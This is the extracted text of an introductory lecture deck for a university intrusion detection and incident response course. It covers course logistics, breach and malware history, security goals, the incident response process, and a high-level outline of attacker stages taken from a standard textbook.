Introduction UTSA IS 6353 Incident Response Overview Course Administrivia Info Assurance Review Incident Response UTSA IS 6353 Incident Response IS6353 Intrusion Detection and Incident Response ID: 933971
Download Presentation The PPT/PDF document "L esson 1 IS-6353 Course" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
L
esson 1
IS-6353
Course
Introduction
Slide2UTSA IS 6353 Incident Response
Overview
Course Administrivia
Info Assurance Review
Incident Response
Slide3UTSA IS 6353 Incident Response
IS6353 Intrusion Detection
and
Incident Response
6:00-7:50
PM
T/TH
Robert Kaufman
Background
Contact information
Syllabus and Class Schedule
Student Background Information
Email to robert.kaufman@utsa.edu
Slide4UTSA IS 6353 Incident Response
Student Information
Send an email to me with:
Name
Reliable email address
Email
to:
robkaufmaniii@sbcglobal.net
Slide5UTSA IS 6353 Incident Response
Text Books
Course Text:
Incident Response and Computer Forensics
McGraw
Hill Publishing,
2014.
ISBN
978-0071798686
Additional References:
Principles of Computer Security, Conklin, White,
Cothren
, Williams, and Davis
Hacking Exposed, by McClure,
Scambray
, Kurtz
Cyber crime Investigator’s Field Guide, by Bruce Middleton
Slide6UTSA IS 6353 Incident Response
Grading
Grades
2 Tests
Final (maybe)
1 Paper
5
Labs
Slide77
Slide88
Mandiant
APT 1
Information
Information Technology
Transportation
High Tech Electronics
Financial Services
Navigation
Legal Services
Engineering Services
Media, Advertising, & Entertainment
Food and Agriculture
Satellites & Telecommunications
Chemicals
Energy
International Organizations
Scientific Research and Consulting
Public
Adminstration
Construction & Manufacturing
Aerospace
Education
Metals and Mining
Healthcare
2006 2007 2008 2009 2010 2011 2012
Slide9Noteable
SQL Injection Breaches
9
Source: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame
/
2013
2012
2011
2010
2009
2007
Heartland
130,000,000
LivingSocial
50,000,000
GlobalPayments
$92,000,000
Gamingo
11,000,000
Ingenicard
$9,000,000
Sony
Playstation
7,000,000
LinkedIn
6,500,000
Sony
Pictures
1,000,000
Dexia Bank
1,700,000
FBI/NASA
1,600,000
Hannaford
4,200,000
VISA
(Jordan)
800,000
Diner
’
s
Club
500,000
Yahoo
450,000
Adobe
150,000
Domino
’
s
Pizza
37,000
Source: codecurmudgeon.com/
wp
/
sql
-injection-hall-of-shame
Fed Gov
’
t
100,000
Target?
70,000,000
Fed Resv
4000
TJX
47,000,000
$254M loss
$455M loss
Slide10Notable Recent Activity
SONY Hack
Anthem – Medical Data
$1B Worldwide Bank Heist
Target
Heartland Systems (aka TJ Max Credit Cards)
Traffic reroutes (
Russia
China
,
ChinaBelarus
)
Venom--
for
“virtualized environment neglected operations manipulation
,” shatters myth of cloud security
WannaCry
Ransomware
Slide11A Sampling of Malicious Activity
March 1999 - EBay gets hacked
March 1999 - Melissa virus hits Internet
April 1999 - Chernobyl Virus hits
May 1999 - Hackers shut down web sites of FBI, Senate, and DOE
June 1999 - Worm.Explore.Zip virus hits
July 1999 - Cult of the Dead Cow (CDC) releases Back Orifice
Sept 1999 - Hacker pleads guilty to attacking NATO and Gore web sites
Oct 1999 - Teenage hacker admits to breaking into AOL
Slide12A Sampling of Malicious Activity
Nov 1999 - BubbleBoy virus hits
Dec 1999 - Babylonia virus spreads
Feb 2000 - Several sites experience DOS attacks
Feb 2000 - Alaska Airlines site hacked
May 2000 - Love Bug virus ravages net
July 2001 –
Code Red Runs Rampant
Sept 2001 – Nimda Explodes
Slide13A Sampling of Malicious Activity
Jan 2003 – Sapphire/Slammer Worm
Aug 2003 – Blaster (
LoveSan
) Worm
Jan 2004 –
MyDoom
Mar 2004 – Witty Worm
May 2004 –
Sasser
Worm
Dec 2006 – TJX Credit/Debit Card
Theft
Jan 2007 – Storm Worm
Mar 2009 -
Conficker
June 2010 -
Stuxnet
http://en.wikipedia.org/wiki/Timeline_of_notable_computer_viruses_and_worms
Slide14https
://
www.caida.org/publications/papers/2003/sapphire/sapphire.html
S
6353 Incident Response
Spread of Slammer—25 Jan 05:29 UTC
Slide15UTSA IS 6353 Incident Response
Spread of Slammer—25 Jan 06:00 UTC
Slide16UTSA IS 6353 Incident Response
CSI Survey: Average Loss
Ref: 2008 CSI Survey
Slide17Current Landscape
Q1 2018 BY THE NUMBERS
Exploits
▪ 6,623
unique detections (+11%)
▪ 238
detections per firm (-13%)
▪ 73
% saw severe exploits (+1%)
▪ <
1% recorded ICS-related
exploits
UTSA IS 6353 Incident Response
Malware
▪
15,071 unique variants (-15%)
▪ 3,078 different families (-2%)
▪ 3 variants spread to ≥1/10 firms (-67%)
▪ 28% saw
cryptojacking
malware (+15%)
Botnets
▪ 1.8
active botnets per firm (0%)
--
2.8% saw ≥10 botnets (-1%)▪ 58
% of botnet infections last 1 day▪ 5% of botnet infections last >1 week
Ref: Fortinet Q1 CY18 Trend Report
Slide18UTSA IS 6353 Incident Response
Early DISA
Vulnerabilty
Assessment Program Results
P
R
O
T
E
C
T
I
O
N
D
E
T
E
C
T
I
O
N
R
EA
CTION
38,000
Attacks
24,700
Succeed
13,300
Blocked
988
Detected
23,712
Undetected
267
Reported
721 Not
Reported
Slide19UTSA IS 6353 Incident Response
Computer Security
The Prevention and/or detection of unauthorized actions by users of a computer system.
In the beginning, this meant ensuring privacy on shared systems.
Today, interesting aspect of security is in enabling different access levels.
Slide20UTSA IS 6353 Incident Response
What are our goals in Security?
The “CIA” of security
Confidentiality
Integrity
Data integrity
Software Integrity
Availability
Accessible and usable on demand
(authentication)
(nonrepudiation)
Slide21UTSA IS 6353 Incident Response
The “root” of the problem
Most security problems can be grouped into one of the following categories:
Network and host misconfigurations
Lack of qualified people in the field
Operating system and application flaws
Deficiencies in vendor quality assurance efforts
Lack of qualified people in the field
Lack of understanding of/concern for security
Slide22UTSA IS 6353 Incident Response
Computer Security Operational Model
Protection = Prevention
+ (Detection + Response)
Access Controls
Encryption
Firewalls
Intrusion Detection
Incident Handling
Slide23UTSA IS 6353 Incident Response
Proactive –vs- Reactive Models
“Most organizations only react to security threats, and, often times, those reactions come after the damage has already been done.”
“The key to a successful information security program resides in taking a pro-active stance towards security threats, and attempting to eliminate vulnerability points before they can be used against you.”
Slide24UTSA IS 6353 Incident Response
So What Happens When Computer Security Fails?
Incident Response Methodology--7 Step Process
Preparation: Proactive Computer Security
Detection of Incidents
Initial Response
Formulate Response Strategy
Investigate the Incident
Reporting
Resolution
Slide25UTSA IS 6353 Incident Response
7 Components of Incident Response
Pre-Incident
Preparation
Detection
of
Incidents
Initial
Response
Formulate
Response
Strategy
Data
Collection
Data
Analysis
Reporting
Investigate the Incident
Resolution
Recovery
Implement Security Measures
Page 15, Fig 2-1, Mandia 2nd Edition
Slide26UTSA IS 6353 Incident Response
Resources in the Fight
SANS
CERT CC
FIRST
CERIAS
NIST
CIAS
Slide27UTSA IS 6353 Incident Response
SANS
System Administration, Networking, and Security (SANS) Institute
Global Incident Analysis Center
Security Alerts, Updates, & Education
NewsBites, Security Digest, Windows
Digest
Certification
http://www.sans.org/
Slide28UTSA IS 6353 Incident Response
Carnegie Mellon CERT CC
Computer Emergency Response Team Coordination Center
Started by DARPA
Alerts & Response Services
Training and CERT Standup
Clearing House
http://www.cert.org
Slide29UTSA IS 6353 Incident Response
FIRST
Forum of Incident Response and Security
Teams
Established 1988
Govt & Private Sector Membership
Over 70 Members
Coordinate Global Response
http://www.first.org
Slide30UTSA IS 6353 Incident Response
CERIAS
Center for Education and Research in
Information Assurance and Security
Home of Gene Spafford
A "University Center"
InfoSec Research & Education
Members: Academia, Govt, & Industry
http://www.cerias.purdue.edu/coast/)
Slide31UTSA IS 6353 Incident Response
NIST
National Institute of Science and Technology (NIST)
Operares Computer Security
Resource Clearinghouse (CSRC)
Raising Awarenss
Multiple Disciplines
Main Source of Fed Govt Standards
http://csrc.ncsl.nist.gov/
Slide32UTSA IS 6353 Incident Response
CIAS
UTSA’s Center for Infrastructure Assurance and Security (CIAS)
Multidisciplinary education and development of operational capabilities in the areas of infrastructure assurance and security.
National Cyber Exercises
Cyber Security Training
Cyber Competitions
http://www.utsa.edu/cias/
Slide33UTSA IS 6353 Incident Response
Lets
See What the CERT
CMU Says
.
http://www.cert.org
/
U.S.
CERT
https://www.us-cert.gov/
How Many
Vulnerabilities Are
Out There
Slide34UTSA IS 6353 Incident Response
History Lesson
The Art of War, Sun Tzu
Lesson for you
Know the enemy
Know yourself…and in a 100 battles you will never be defeated
If ignorant both of your enemy and of yourself you are certain in every battle to be in peril
Slide35UTSA IS 6353 Incident Response
History Lesson
The Art of War, Sun Tzu
Lesson for the Hacker
Probe him and learn where his strength is abundant and where deficient
To subdue the enemy without fighting is the acme of skill
One able to gain victory by modifying his tactics IAW with enemy situation may be said to be divine
Slide36UTSA IS 6353 Incident Response
Hacker Attacks
Intent is for you to know your enemy
Not intended to make you a hacker
Need to know defensive techniques
Need to know where to start recovery process
Need to assess extent of investigative environment
Slide37UTSA IS 6353 Incident Response
Anatomy of a Hack
FOOTPRINTING
SCANNING
ENUMERATION
GAINING ACCESS
ESCALATING
PRIVILEGE
PILFERING
COVERING
TRACKS
CREATING
BACKDOORS
DENIAL
OF
SERVICE
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Click on each block for description of activity
Slide38UTSA IS 6353 Incident Response
Footprinting
Objective
Target Address Range
Acquire Namespace
Information Gathering
Surgical Attack
Don’t Miss Details
Technique
Open Source Search
whois
Web Interface to whois
ARIN whois
DNS Zone Transfer
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide39UTSA IS 6353 Incident Response
Scanning
Objective
Bulk target assessment
Determine Listening Services
Focus attack vector
Technique
Ping Sweep
TCP/UDP Scan
OS Detection
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide40UTSA IS 6353 Incident Response
Enumeration
Objective
Intrusive Probing Commences
Identify valid accounts
Identify poorly protected shares
Technique
List user accounts
List file shares
Identify applications
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide41UTSA IS 6353 Incident Response
Gaining Access
Objective
Informed attempt to access target
Typically User level access
Technique
Password sniffing
File share brute forcing
Password file grab
Buffer overflows
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide42UTSA IS 6353 Incident Response
Escalating Privilege
Objective
Gain Root level access
Technique
Password cracking
Known exploits
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide43UTSA IS 6353 Incident Response
Pilfering
Objective
Info gathering to access trusted systems
Technique
Evaluate trusts
Search for cleartext passwords
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide44UTSA IS 6353 Incident Response
Cover Tracks
Objective
Ensure highest access
Hide access from system administrator or owner
Technique
Clear logs
Hide tools
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide45UTSA IS 6353 Incident Response
Creating Back Doors
Objective
Deploy trap doors
Ensure easy return access
Technique
Create rogue user accounts
Schedule batch jobs
Infect startup files
Plant remote control services
Install monitors
Trojanize
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide46UTSA IS 6353 Incident Response
Denial of Service
Objective
If unable to escalate privilege then kill
Build DDOS network
Technique
SYN Flood
ICMP Attacks
Identical src/dst SYN requests
Out of bounds TCP options
DDOS
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Slide47UTSA IS 6353 Incident Response
Hacking Summary
Threat: Hacking on the rise
Security posture usually reactive
Losses increasing
7 Step Process
Hacker Techniques